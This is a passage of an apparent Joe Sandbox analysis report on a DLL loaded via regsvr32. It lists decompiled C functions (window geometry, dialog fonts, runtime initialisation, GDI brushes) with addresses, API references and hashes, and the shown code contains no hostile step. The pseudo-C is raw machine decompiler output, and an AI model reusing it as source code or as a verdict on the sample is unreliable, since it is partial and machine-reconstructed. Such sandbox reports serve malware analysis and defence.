                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$Rect$DesktopMoveShowVisible
                                                                                                            • String ID:
                                                                                                            • API String ID: 3835705305-0
                                                                                                            • Opcode ID: deebbd18c64334d53d6a070cc2f7cf5956eb5d0ae01d3c8a610755a7333daa4e
                                                                                                            • Instruction ID: 525efb47f72b729c7b32d6b473f79529eff02a82a59350a91d8b9bca58045246
                                                                                                            • Opcode Fuzzy Hash: deebbd18c64334d53d6a070cc2f7cf5956eb5d0ae01d3c8a610755a7333daa4e
                                                                                                            • Instruction Fuzzy Hash: F351D875A0020AAFDB00DFA8DD84CAEB7BAFF48345B154459F646E7255CB31BE41CB60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1003078E Relevance: 6.1, APIs: 4, Instructions: 134COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 91%
                                                                                                            			E1003078E(void* __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				char _v12;
				struct tagRECT _v28;
				struct tagRECT _v44;
				struct tagRECT _v60;
				void* _t76;
				int _t78;
				intOrPtr _t83;
				intOrPtr _t102;
				int _t116;
				void* _t124;
				void* _t128;
				intOrPtr _t133;
				void* _t135;
				void* _t139;

				_t135 = __edi;
				_t124 = __ecx;
				_t76 = _a4 -  *((intOrPtr*)(__ecx + 4));
				_t128 = _a8 -  *((intOrPtr*)(__ecx + 8));
				_t133 =  *((intOrPtr*)(__ecx + 0x8c));
				_t139 = 2;
				if(_t133 == 0xa) {
					L7:
					 *((intOrPtr*)(_t124 + 0x28)) =  *((intOrPtr*)(_t124 + 0x28)) + _t76;
					L9:
					_t78 =  *((intOrPtr*)(_t124 + 0x30)) -  *((intOrPtr*)(_t124 + 0x28));
					__eflags = _t78;
					L10:
					if(_t78 < 0) {
						_t78 = 0;
					}
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t124 + 0x68)))) + 0x134))( &_v12, _t78, _t139, _t135);
					GetWindowRect(GetDesktopWindow(),  &_v44);
					_t83 =  *((intOrPtr*)(_t124 + 0x8c));
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					if(_t83 == 0xa || _t83 == 0xc) {
						_v28.left = _v28.right -  *((intOrPtr*)(_t124 + 0x60)) - _v12 +  *((intOrPtr*)(_t124 + 0x58));
						_v28.top =  *((intOrPtr*)(_t124 + 0x5c)) -  *((intOrPtr*)(_t124 + 0x64)) - _v8 + _v28.bottom;
						__eflags = IntersectRect( &_v60,  &_v44,  &_v28);
						if(__eflags != 0) {
							 *((intOrPtr*)(_t124 + 0x38)) =  *((intOrPtr*)(_t124 + 0x40)) - _v12;
							_t102 =  *((intOrPtr*)(_t124 + 0x44)) - _v8;
							__eflags = _t102;
							 *((intOrPtr*)(_t124 + 0x3c)) = _t102;
							 *(_t124 + 0x48) = _v28.left;
							 *((intOrPtr*)(_t124 + 0x4c)) = _v28.top;
						}
					} else {
						_v28.right =  *((intOrPtr*)(_t124 + 0x60)) -  *((intOrPtr*)(_t124 + 0x58)) + _v28.left + _v12;
						_v28.bottom =  *((intOrPtr*)(_t124 + 0x64)) -  *((intOrPtr*)(_t124 + 0x5c)) + _v28.top + _v8;
						_t116 = IntersectRect( &_v60,  &_v44,  &_v28);
						_t149 = _t116;
						if(_t116 != 0) {
							 *((intOrPtr*)(_t124 + 0x40)) =  *((intOrPtr*)(_t124 + 0x38)) + _v12;
							 *((intOrPtr*)(_t124 + 0x44)) =  *((intOrPtr*)(_t124 + 0x3c)) + _v8;
							 *((intOrPtr*)(_t124 + 0x50)) = _v28.right;
							 *((intOrPtr*)(_t124 + 0x54)) = _v28.bottom;
						}
					}
					 *((intOrPtr*)(_t124 + 4)) = _a4;
					 *((intOrPtr*)(_t124 + 8)) = _a8;
					return E10030582(_t124, _t149, 0);
				}
				if(_t133 == 0xb) {
					__eflags = _t133 - 0xa;
					if(_t133 != 0xa) {
						_t14 = __ecx + 0x30;
						 *_t14 =  *((intOrPtr*)(__ecx + 0x30)) + _t76;
						__eflags =  *_t14;
						goto L9;
					}
					goto L7;
				} else {
					_t139 = 0x22;
					if(_t133 != 0xc) {
						_t8 = __ecx + 0x34;
						 *_t8 =  *((intOrPtr*)(__ecx + 0x34)) + _t128;
						__eflags =  *_t8;
					} else {
						 *((intOrPtr*)(__ecx + 0x2c)) =  *((intOrPtr*)(__ecx + 0x2c)) + _t128;
					}
					_t78 =  *((intOrPtr*)(_t124 + 0x34)) -  *((intOrPtr*)(_t124 + 0x2c));
					goto L10;
				}
			}


















                                                                                                            0x1003078e
                                                                                                            0x10030798
                                                                                                            0x100307a0
                                                                                                            0x100307a6
                                                                                                            0x100307a8
                                                                                                            0x100307b3
                                                                                                            0x100307b4
                                                                                                            0x100307d8
                                                                                                            0x100307d8
                                                                                                            0x100307e0
                                                                                                            0x100307e3
                                                                                                            0x100307e3
                                                                                                            0x100307e6
                                                                                                            0x100307e8
                                                                                                            0x100307ea
                                                                                                            0x100307ea
                                                                                                            0x100307f8
                                                                                                            0x10030809
                                                                                                            0x1003080f
                                                                                                            0x1003081e
                                                                                                            0x1003081f
                                                                                                            0x10030820
                                                                                                            0x10030821
                                                                                                            0x10030823
                                                                                                            0x1003088a
                                                                                                            0x10030899
                                                                                                            0x100308ae
                                                                                                            0x100308b0
                                                                                                            0x100308b8
                                                                                                            0x100308be
                                                                                                            0x100308be
                                                                                                            0x100308c1
                                                                                                            0x100308c7
                                                                                                            0x100308cd
                                                                                                            0x100308cd
                                                                                                            0x1003082a
                                                                                                            0x10030836
                                                                                                            0x10030845
                                                                                                            0x10030854
                                                                                                            0x1003085a
                                                                                                            0x1003085c
                                                                                                            0x10030864
                                                                                                            0x1003086d
                                                                                                            0x10030873
                                                                                                            0x10030879
                                                                                                            0x10030879
                                                                                                            0x1003085c
                                                                                                            0x100308d3
                                                                                                            0x100308dd
                                                                                                            0x100308e8
                                                                                                            0x100308e8
                                                                                                            0x100307b9
                                                                                                            0x100307d3
                                                                                                            0x100307d6
                                                                                                            0x100307dd
                                                                                                            0x100307dd
                                                                                                            0x100307dd
                                                                                                            0x00000000
                                                                                                            0x100307dd
                                                                                                            0x00000000
                                                                                                            0x100307bb
                                                                                                            0x100307c0
                                                                                                            0x100307c1
                                                                                                            0x100307c8
                                                                                                            0x100307c8
                                                                                                            0x100307c8
                                                                                                            0x100307c3
                                                                                                            0x100307c3
                                                                                                            0x100307c3
                                                                                                            0x100307ce
                                                                                                            0x00000000
                                                                                                            0x100307ce

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Rect$IntersectWindow$Desktop
                                                                                                            • String ID:
                                                                                                            • API String ID: 123605412-0
                                                                                                            • Opcode ID: 798443665cb7e1b579a2a184bcc2e050a0f8e43ff96723420b6623ef63c5f40a
                                                                                                            • Instruction ID: 610273ea94d3692e70733b76c969e3fbb3ef96a28992a3e324fe7b4179401a7e
                                                                                                            • Opcode Fuzzy Hash: 798443665cb7e1b579a2a184bcc2e050a0f8e43ff96723420b6623ef63c5f40a
                                                                                                            • Instruction Fuzzy Hash: D2516076A012099FCB45DFACC5D5A9E7BF8FF08355F148195E905EB20AE630E980CFA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10024838 Relevance: 6.1, APIs: 4, Instructions: 115stringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10024838(void* __ebx, void** __ecx, void* __edi, void* __esi, char* _a4, short _a8) {
				intOrPtr _v8;
				short _v72;
				signed int _v76;
				signed int _v80;
				void** _v84;
				signed int _v88;
				intOrPtr _t52;
				short* _t65;
				void* _t74;
				short* _t81;
				void* _t86;
				char* _t92;
				signed int _t93;
				signed int* _t95;
				void** _t96;
				signed int _t101;
				signed int _t103;
				void* _t106;

				_t52 =  *0x1004c470; // 0xf3933a06
				_v8 = _t52;
				_v84 = __ecx;
				if(__ecx[1] != 0) {
					_t95 = GlobalLock( *__ecx);
					_v80 = 0 | _t95[0] == 0x0000ffff;
					_v76 = E100246AB(_t95);
					_t101 = (0 | _v80 != 0x00000000) + (0 | _v80 != 0x00000000) + 1 << 1;
					_v88 = _t101;
					if(_v80 == 0) {
						 *_t95 =  *_t95 | 0x00000040;
					} else {
						_t95[3] = _t95[3] | 0x00000040;
					}
					if(lstrlenA(_a4) < 0x20) {
						_a4 = _t101 + MultiByteToWideChar(0, 0, _a4, 0xffffffff,  &_v72, 0x20) * 2;
						_t65 = E1002472A(_t95);
						_t86 = 0;
						_t81 = _t65;
						if(_v76 != 0) {
							_t86 = _t101 + 2 + E100124FC(_t81 + _t101) * 2;
						}
						_t92 = _a4;
						_t31 = _t81 + 3; // 0x3
						_t33 = _t92 + 3; // 0x3
						_t67 = _t86 + _t31 & 0xfffffffc;
						_t103 = _t81 + _t33 & 0xfffffffc;
						_v76 = _t86 + _t31 & 0xfffffffc;
						if(_v80 == 0) {
							_t93 = _t95[2];
						} else {
							_t93 = _t95[4];
						}
						if(_a4 != _t86 && _t93 > 0) {
							E100118B0(_t103, _t67, _t95 - _t67 + _v84[1]);
							_t106 = _t106 + 0xc;
						}
						 *_t81 = _a8;
						E100118B0(_t81 + _v88,  &_v72, _a4 - _v88);
						_t96 = _v84;
						_t96[1] = _t96[1] + _t103 - _v76;
						GlobalUnlock( *_t96);
						_t96[2] = _t96[2] & 0x00000000;
						_t74 = 1;
					} else {
						_t74 = 0;
					}
				} else {
					_t74 = 0;
				}
				return E100117AE(_t74, _v8);
			}





















                                                                                                            0x1002483e
                                                                                                            0x10024849
                                                                                                            0x1002484c
                                                                                                            0x1002484f
                                                                                                            0x10024862
                                                                                                            0x10024870
                                                                                                            0x10024878
                                                                                                            0x1002488d
                                                                                                            0x1002488f
                                                                                                            0x10024892
                                                                                                            0x1002489a
                                                                                                            0x10024894
                                                                                                            0x10024894
                                                                                                            0x10024894
                                                                                                            0x100248a9
                                                                                                            0x100248c9
                                                                                                            0x100248cc
                                                                                                            0x100248d2
                                                                                                            0x100248d7
                                                                                                            0x100248d9
                                                                                                            0x100248e5
                                                                                                            0x100248e5
                                                                                                            0x100248e9
                                                                                                            0x100248ec
                                                                                                            0x100248f0
                                                                                                            0x100248f4
                                                                                                            0x100248f7
                                                                                                            0x100248fe
                                                                                                            0x10024901
                                                                                                            0x10024909
                                                                                                            0x10024903
                                                                                                            0x10024903
                                                                                                            0x10024903
                                                                                                            0x10024910
                                                                                                            0x10024922
                                                                                                            0x10024927
                                                                                                            0x10024927
                                                                                                            0x10024931
                                                                                                            0x10024941
                                                                                                            0x10024946
                                                                                                            0x10024951
                                                                                                            0x10024954
                                                                                                            0x1002495a
                                                                                                            0x10024960
                                                                                                            0x100248ab
                                                                                                            0x100248ab
                                                                                                            0x100248ab
                                                                                                            0x10024851
                                                                                                            0x10024851
                                                                                                            0x10024851
                                                                                                            0x1002496d

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: GlobalLocklstrlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 1144527523-0
                                                                                                            • Opcode ID: 43c45d826a3564adc6f5176af8266918bef1cb386d16f858764c52389791046f
                                                                                                            • Instruction ID: afb049e80b1b3f5565d5b3658fd79ee3861b352aa931f7b78d6a2774fdc8a605
                                                                                                            • Opcode Fuzzy Hash: 43c45d826a3564adc6f5176af8266918bef1cb386d16f858764c52389791046f
                                                                                                            • Instruction Fuzzy Hash: 9341B632900219EFDB14DFB4D88589EBBB8FF44354B518229E815DB255EF70E995CB80
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1001119B Relevance: 6.1, APIs: 4, Instructions: 113threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 75%
                                                                                                            			E1001119B(void* __ebx, void* __ecx, void* __edi, long* _a8) {
				void* _v8;
				void* __esi;
				void* __ebp;
				long* _t9;
				long* _t11;
				long _t17;
				signed int _t25;
				long* _t33;
				long* _t36;
				long* _t38;
				long* _t39;
				long _t47;
				long _t50;
				void* _t52;
				long* _t53;
				struct _OSVERSIONINFOA* _t54;
				signed int _t56;
				struct _OSVERSIONINFOA* _t58;

				_t9 = _a8;
				if(_t9 != 1) {
					__eflags = _t9;
					if(_t9 != 0) {
						__eflags = _t9 - 2;
						if(__eflags != 0) {
							__eflags = _t9 - 3;
							if(_t9 == 3) {
								E10015355(0);
							}
							L27:
							_t11 = 1;
							__eflags = 1;
							L28:
							return _t11;
						}
						_push(0x8c);
						_push(1);
						_t53 = E1001382A(__ebx, __edi, _t52, __eflags);
						__eflags = _t53;
						if(_t53 == 0) {
							L24:
							_t11 = 0;
							goto L28;
						}
						__eflags =  *0x1004f5e4( *0x1004c848, _t53);
						_push(_t53);
						if(__eflags == 0) {
							E100107C8(__ebx, __edi, _t53, __eflags);
							goto L24;
						}
						E1001518A();
						_t17 = GetCurrentThreadId();
						_t53[1] = _t53[1] | 0xffffffff;
						 *_t53 = _t17;
						goto L27;
					}
					__eflags =  *0x1004f3c8 - _t9; // 0x0
					if(__eflags <= 0) {
						goto L24;
					}
					 *0x1004f3c8 =  *0x1004f3c8 - 1;
					__eflags =  *0x1004f41c - _t9; // 0x1
					if(__eflags == 0) {
						E10011F67();
					}
					E1001634A();
					E1001516D();
					E10013AD4();
					goto L27;
				}
				E10010B20(0x94, __ecx);
				_t54 = _t58;
				_t54->dwOSVersionInfoSize = 0x94;
				if(GetVersionExA(_t54) == 0) {
					goto L24;
				}
				_t47 = _t54->dwPlatformId;
				 *0x1004f3e0 = _t47;
				_t25 = _t54->dwMajorVersion;
				 *0x1004f3ec = _t25;
				_t50 = _t54->dwMinorVersion;
				 *0x1004f3f0 = _t50;
				_t56 = _t54->dwBuildNumber & 0x00007fff;
				 *0x1004f3e4 = _t56;
				if(_t47 != 2) {
					 *0x1004f3e4 = _t56 | 0x00008000;
				}
				 *0x1004f3e8 = (_t25 << 8) + _t50;
				if(E10013A83(1) != 0) {
					if(E10015384() != 0) {
						E1001678D(__eflags);
						 *0x10050cb0 = GetCommandLineA();
						 *0x1004f3cc = E1001666B();
						_t33 = E1001614C();
						__eflags = _t33;
						if(_t33 < 0) {
							L13:
							E1001516D();
							goto L6;
						}
						_t36 = E100165C9();
						__eflags = _t36;
						if(_t36 < 0) {
							L12:
							E1001634A();
							goto L13;
						}
						_t38 = E10016396();
						__eflags = _t38;
						if(_t38 < 0) {
							goto L12;
						}
						_t39 = E10011E29(0);
						__eflags = _t39;
						if(_t39 != 0) {
							goto L12;
						}
						 *0x1004f3c8 =  *0x1004f3c8 + 1;
						goto L27;
					}
					L6:
					E10013AD4();
				}
			}





















                                                                                                            0x1001119e
                                                                                                            0x100111a5
                                                                                                            0x1001128b
                                                                                                            0x1001128d
                                                                                                            0x100112bb
                                                                                                            0x100112be
                                                                                                            0x10011304
                                                                                                            0x10011307
                                                                                                            0x1001130b
                                                                                                            0x10011310
                                                                                                            0x10011311
                                                                                                            0x10011313
                                                                                                            0x10011313
                                                                                                            0x10011314
                                                                                                            0x10011319
                                                                                                            0x10011319
                                                                                                            0x100112c0
                                                                                                            0x100112c5
                                                                                                            0x100112cc
                                                                                                            0x100112ce
                                                                                                            0x100112d2
                                                                                                            0x10011300
                                                                                                            0x10011300
                                                                                                            0x00000000
                                                                                                            0x10011300
                                                                                                            0x100112e1
                                                                                                            0x100112e3
                                                                                                            0x100112e4
                                                                                                            0x100112fa
                                                                                                            0x00000000
                                                                                                            0x100112ff
                                                                                                            0x100112e6
                                                                                                            0x100112ec
                                                                                                            0x100112f2
                                                                                                            0x100112f6
                                                                                                            0x00000000
                                                                                                            0x100112f6
                                                                                                            0x1001128f
                                                                                                            0x10011295
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10011297
                                                                                                            0x1001129d
                                                                                                            0x100112a3
                                                                                                            0x100112a5
                                                                                                            0x100112a5
                                                                                                            0x100112aa
                                                                                                            0x100112af
                                                                                                            0x100112b4
                                                                                                            0x00000000
                                                                                                            0x100112b4
                                                                                                            0x100111b0
                                                                                                            0x100111b5
                                                                                                            0x100111b8
                                                                                                            0x100111c6
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100111cc
                                                                                                            0x100111cf
                                                                                                            0x100111d5
                                                                                                            0x100111d8
                                                                                                            0x100111dd
                                                                                                            0x100111e0
                                                                                                            0x100111e9
                                                                                                            0x100111f2
                                                                                                            0x100111f8
                                                                                                            0x10011200
                                                                                                            0x10011200
                                                                                                            0x1001120d
                                                                                                            0x1001121a
                                                                                                            0x10011227
                                                                                                            0x10011233
                                                                                                            0x1001123e
                                                                                                            0x10011248
                                                                                                            0x1001124d
                                                                                                            0x10011252
                                                                                                            0x10011254
                                                                                                            0x10011284
                                                                                                            0x10011284
                                                                                                            0x00000000
                                                                                                            0x10011284
                                                                                                            0x10011256
                                                                                                            0x1001125b
                                                                                                            0x1001125d
                                                                                                            0x1001127f
                                                                                                            0x1001127f
                                                                                                            0x00000000
                                                                                                            0x1001127f
                                                                                                            0x1001125f
                                                                                                            0x10011264
                                                                                                            0x10011266
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001126a
                                                                                                            0x1001126f
                                                                                                            0x10011272
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10011274
                                                                                                            0x00000000
                                                                                                            0x10011274
                                                                                                            0x10011229
                                                                                                            0x10011229
                                                                                                            0x10011229

                                                                                                            APIs
                                                                                                            • GetVersionExA.KERNEL32(?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 100111BE
                                                                                                            • GetCommandLineA.KERNEL32(?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10011238
                                                                                                              • Part of subcall function 1001666B: GetEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,10011248,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10016687
                                                                                                              • Part of subcall function 1001666B: GetEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,10011248,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 100166BD
                                                                                                              • Part of subcall function 1001666B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,10011248), ref: 100166F1
                                                                                                              • Part of subcall function 1001666B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,?,10011248,?,?), ref: 10016713
                                                                                                              • Part of subcall function 1001666B: FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,10011248,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 1001672C
                                                                                                              • Part of subcall function 1001382A: __lock.LIBCMT ref: 1001386E
                                                                                                              • Part of subcall function 1001382A: RtlAllocateHeap.NTDLL(00000008,?,10041E40,00000010,100151C5,00000001,0000008C,?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000), ref: 100138AC
                                                                                                            • FlsSetValue.KERNEL32(00000000,?,?,10011379,?,?,?,10041D40,0000000C), ref: 100112DB
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 100112EC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: EnvironmentStrings$ByteCharMultiWide$AllocateCommandCurrentFreeHeapLineThreadValueVersion__lock
                                                                                                            • String ID:
                                                                                                            • API String ID: 770256606-0
                                                                                                            • Opcode ID: 0bbb6c4510ef70c4376c2f3441da33c3dbf9baf309990ecdfd17b149b5dc2492
                                                                                                            • Instruction ID: a119cf37508875902a7ac88b5959fce435ef45eee062e48075b7e26cf38889a7
                                                                                                            • Opcode Fuzzy Hash: 0bbb6c4510ef70c4376c2f3441da33c3dbf9baf309990ecdfd17b149b5dc2492
                                                                                                            • Instruction Fuzzy Hash: 7D31F635904312DBF728DFB08D8669A77E4EF05792F10412EF860CE552EB30EAC08B61
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10030582 Relevance: 6.1, APIs: 4, Instructions: 105COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 78%
                                                                                                            			E10030582(void* __ecx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				struct tagRECT _v40;
				void* __esi;
				void* __ebp;
				signed char _t60;
				signed char _t65;
				intOrPtr _t67;
				signed int _t73;
				void* _t76;
				intOrPtr _t83;
				void* _t91;

				_t91 = __eflags;
				_t76 = __ecx;
				_v24 = 1;
				_v20 = 1;
				_push(GetStockObject(0));
				_t83 = E1002934F();
				_v16 = _t83;
				_v8 = E10033F2F(_t83, _t91);
				_t60 =  *(_t76 + 0x74);
				_v12 = _t83;
				if((0x0000a000 & _t60) == 0) {
					__eflags = _t60 & 0x00000050;
					if(__eflags == 0) {
						_v24 = GetSystemMetrics(0x20) - 1;
						_v20 = GetSystemMetrics(0x21) - 1;
						_t65 =  *(_t76 + 0x78);
						__eflags = 0x0000a000 & _t65;
						if((0x0000a000 & _t65) == 0) {
							L6:
							__eflags = _t65 & 0x00000050;
							if(__eflags == 0) {
								L9:
							} else {
								__eflags =  *(_t76 + 0x7c);
								if(__eflags == 0) {
									goto L9;
								} else {
									goto L8;
								}
							}
						} else {
							__eflags =  *(_t76 + 0x7c);
							if(__eflags != 0) {
								goto L6;
							}
						}
						_v12 = _v8;
					} else {
					}
				} else {
				}
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				if(_a4 != 0) {
					_v20 = 0;
					_v24 = 0;
				}
				if(( *(_t76 + 0x75) & 0x000000f0) != 0) {
					InflateRect( &_v40, 0xffffffff, 0xffffffff);
				}
				_t95 =  *(_t76 + 0x24);
				_t67 = _v8;
				if( *(_t76 + 0x24) == 0) {
					_t67 = _v16;
				}
				E10033FCE( *((intOrPtr*)(_t76 + 0x84)), _t95,  &_v40, _v24, _v20, _t76 + 0xc,  *((intOrPtr*)(_t76 + 0x1c)),  *((intOrPtr*)(_t76 + 0x20)), _v12, _t67);
				asm("movsd");
				 *((intOrPtr*)(_t76 + 0x1c)) = _v24;
				asm("movsd");
				 *((intOrPtr*)(_t76 + 0x20)) = _v20;
				asm("movsd");
				_t73 = 0 | _v12 == _v8;
				asm("movsd");
				 *(_t76 + 0x24) = _t73;
				return _t73;
			}


















                                                                                                            0x10030582
                                                                                                            0x10030590
                                                                                                            0x10030592
                                                                                                            0x10030595
                                                                                                            0x1003059e
                                                                                                            0x100305a4
                                                                                                            0x100305a6
                                                                                                            0x100305ae
                                                                                                            0x100305b1
                                                                                                            0x100305b4
                                                                                                            0x100305be
                                                                                                            0x100305c5
                                                                                                            0x100305c8
                                                                                                            0x100305dc
                                                                                                            0x100305e2
                                                                                                            0x100305e5
                                                                                                            0x100305e8
                                                                                                            0x100305ea
                                                                                                            0x100305f2
                                                                                                            0x100305f2
                                                                                                            0x100305f5
                                                                                                            0x10030602
                                                                                                            0x100305f7
                                                                                                            0x100305f7
                                                                                                            0x100305fb
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100305fb
                                                                                                            0x100305ec
                                                                                                            0x100305ec
                                                                                                            0x100305f0
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100305f0
                                                                                                            0x10030608
                                                                                                            0x100305ca
                                                                                                            0x100305ca
                                                                                                            0x100305c0
                                                                                                            0x100305c0
                                                                                                            0x1003060e
                                                                                                            0x1003060f
                                                                                                            0x10030610
                                                                                                            0x10030611
                                                                                                            0x10030617
                                                                                                            0x10030619
                                                                                                            0x1003061c
                                                                                                            0x1003061c
                                                                                                            0x10030623
                                                                                                            0x1003062d
                                                                                                            0x1003062d
                                                                                                            0x10030633
                                                                                                            0x10030636
                                                                                                            0x10030639
                                                                                                            0x1003063b
                                                                                                            0x1003063b
                                                                                                            0x1003065c
                                                                                                            0x1003066a
                                                                                                            0x1003066b
                                                                                                            0x10030671
                                                                                                            0x10030672
                                                                                                            0x1003067a
                                                                                                            0x1003067b
                                                                                                            0x1003067e
                                                                                                            0x10030681
                                                                                                            0x10030686

                                                                                                            APIs
                                                                                                            • GetStockObject.GDI32(00000000), ref: 10030598
                                                                                                              • Part of subcall function 10033F2F: CreateBitmap.GDI32(00000008,00000008,00000001,00000001,100305AE), ref: 10033F73
                                                                                                              • Part of subcall function 10033F2F: CreatePatternBrush.GDI32(00000000), ref: 10033F80
                                                                                                              • Part of subcall function 10033F2F: DeleteObject.GDI32(00000000), ref: 10033F8C
                                                                                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 1003062D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateObject$BitmapBrushDeleteInflatePatternRectStock
                                                                                                            • String ID:
                                                                                                            • API String ID: 3923860780-0
                                                                                                            • Opcode ID: a91736406a3bc21c34a15b15e2e7e71349b5931477c524aa32b1e52334f80afc
                                                                                                            • Instruction ID: 9af8668bb33911b9f969ea6b6b6f254ec0c1e141af5f513437efede38b15d734
                                                                                                            • Opcode Fuzzy Hash: a91736406a3bc21c34a15b15e2e7e71349b5931477c524aa32b1e52334f80afc
                                                                                                            • Instruction Fuzzy Hash: BF410371D016199FDF42CFA4C980A9EBBF5EB48351F1142A5E911AB29AD370AE41CF90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1002084F Relevance: 6.1, APIs: 4, Instructions: 103windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 94%
                                                                                                            			E1002084F(void* __ecx, struct HWND__** _a4) {
				struct HWND__** _v8;
				struct HWND__** _v12;
				long _t31;
